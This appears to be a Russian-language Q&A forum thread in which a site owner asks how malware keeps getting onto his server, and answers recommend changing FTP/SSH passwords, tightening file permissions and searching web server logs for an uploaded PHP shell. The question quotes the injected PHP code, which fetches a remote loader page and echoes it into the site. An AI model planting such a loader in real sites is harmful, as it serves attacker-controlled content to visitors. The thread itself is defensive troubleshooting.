danielnewman
@danielnewman
Front-end

Заколебали подсаживать малварь на сервер. Как отловить точку входа?

$url = "http://example.com/×××××/loader.html";
$code = @file_get_contents ($url);
echo $code;
  • Вопрос задан
  • 3880 просмотров
Пригласить эксперта
Ответы на вопрос 4
opium
@opium
Просто люблю качественно работать
обычно фтп или ssh, вы пароли эти поменяли? если нет то меняйте.
Если где то дыра в коде, то тоже просто решается задача выставлением необходимых прав на файлы и директории, в php никто не сможет написать, а аплоуд нового файла легко отследить.
Ответ написан
barker
@barker
Сдаётся мне это всё через ftp/sh итд лезет в нормальном режиме с обычных клиентских машин. Это самый простой путь, очевидно.
Ответ написан
По моему скромному опыту: это делают боты через уже известные дыры в джумла/пхпбб/етц, заливают пхпшелл и далее по тексту. Как правило, заражение происходит примерно в то же время, что и заливка шелла, и шелл не удаляется. Поэтому надо посмотреть время редактирования/создания сомнительных файлов, посмотреть в логах вебсервера в этот период обращения к необычным урлам и поискать там искомый шелл. После нахождения шелла посмотреть время его создания и смотреть логи на предмет обращения точно в это время к вебсерверу, дабы найти какой именно урл запрашивали, чтобы активировать дыру и загрузить через нее шелл.

Ну как один из вариантов.
Ответ написан
Комментировать
@lubezniy
Читайте логи, они рулез. И не только Web-сервера. Мне однажды в /var/log/messages (если мне память не изменяет) попались сообщения от wget, который запускали для заливки файла. По времени потом прошерстил access.log и нашёл URI скрипта, в который заранее подставили бяку.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы